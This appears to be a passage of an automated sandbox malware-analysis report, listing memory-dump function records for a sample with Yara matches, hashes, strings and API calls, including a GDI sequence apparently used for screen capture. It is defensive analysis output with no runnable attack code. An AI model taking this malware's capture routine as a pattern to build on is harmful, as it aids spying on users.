                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DrivesLogical
                                                                            • String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
                                                                            • API String ID: 999431828-351939610
                                                                            • Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                            • Instruction ID: ec39fcd7a9348265284cff61e82c9a97c800a7a44b882fc080b4e0d7450ee356
                                                                            • Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                            • Instruction Fuzzy Hash: 2731DAB4109344CFCB10CF29C85122BBBB2FFC1764F04981CE58A8B720EBB99946CB42
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 00786BF0
                                                                            • GetCurrentObject.GDI32(00000000,00000007), ref: 00786C11
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00786C21
                                                                            • DeleteObject.GDI32(00000000), ref: 00786C28
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00786C37
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00786C42
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00786C4E
                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00786C71
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
                                                                            • String ID:
                                                                            • API String ID: 2843486406-0
                                                                            • Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                            • Instruction ID: 5319de3faf2e57a16687f20dce20ae1495ae84410e949012788674b88ea37a69
                                                                            • Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                            • Instruction Fuzzy Hash: 39214FB9544310EFE3509F609C49B2B7BF8EB8AB11F014929FA59E2290D77498048B67
                                                                            APIs
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00775411
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStrings
                                                                            • String ID: +$e$+$e$XY$E#G
                                                                            • API String ID: 237503144-1023387988
                                                                            • Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                            • Instruction ID: b0a76575148cc22cc85281ef73b99f79325585afa9b771489537fec178bbd961
                                                                            • Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                            • Instruction Fuzzy Hash: 0221F73424C344AFD3148F65D88175FBBE0EBC6754F25C92CE5A857292D7B9C80A8B86
                                                                            APIs
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00775B5B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStrings
                                                                            • String ID: B"@$`J/H$rp
                                                                            • API String ID: 237503144-3817236508
                                                                            • Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                            • Instruction ID: a5ceb00a09e87ef910616da92f0307ef71fcee3a6daf17debdc789bf789d1e22
                                                                            • Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                            • Instruction Fuzzy Hash: 9A31CDB0E443489FDB10CFA9D8827DEBBB2EF45700F10452CE441BB295D6B55906CFA9
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID: aN@$#v
                                                                            • API String ID: 3664257935-1204080873
                                                                            • Opcode ID: 6923c55db78119380e5fe35a3321c238481177c04641367e3fdf37507d6e1cbb
                                                                            • Instruction ID: fb7b49653fcfe6187a11668ca7033b53e8d7d933bb39412ee55706a61e0bd157
                                                                            • Opcode Fuzzy Hash: 6923c55db78119380e5fe35a3321c238481177c04641367e3fdf37507d6e1cbb
                                                                            • Instruction Fuzzy Hash: 5951777460C3C08BE3358B299C557ABBFE29FE2308F48096DE0D95B3D2DA74440AC75A
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID: #v
                                                                            • API String ID: 3664257935-554117064
                                                                            • Opcode ID: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
                                                                            • Instruction ID: 76f8199259777ce60f51c6d99c718f1815bb22ab62b72bec75753df54c08d8dc
                                                                            • Opcode Fuzzy Hash: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
                                                                            • Instruction Fuzzy Hash: E2C0023B8620009BDE857FA0FD898187A31FB4A30531C44B4B80140036DAA20960AA59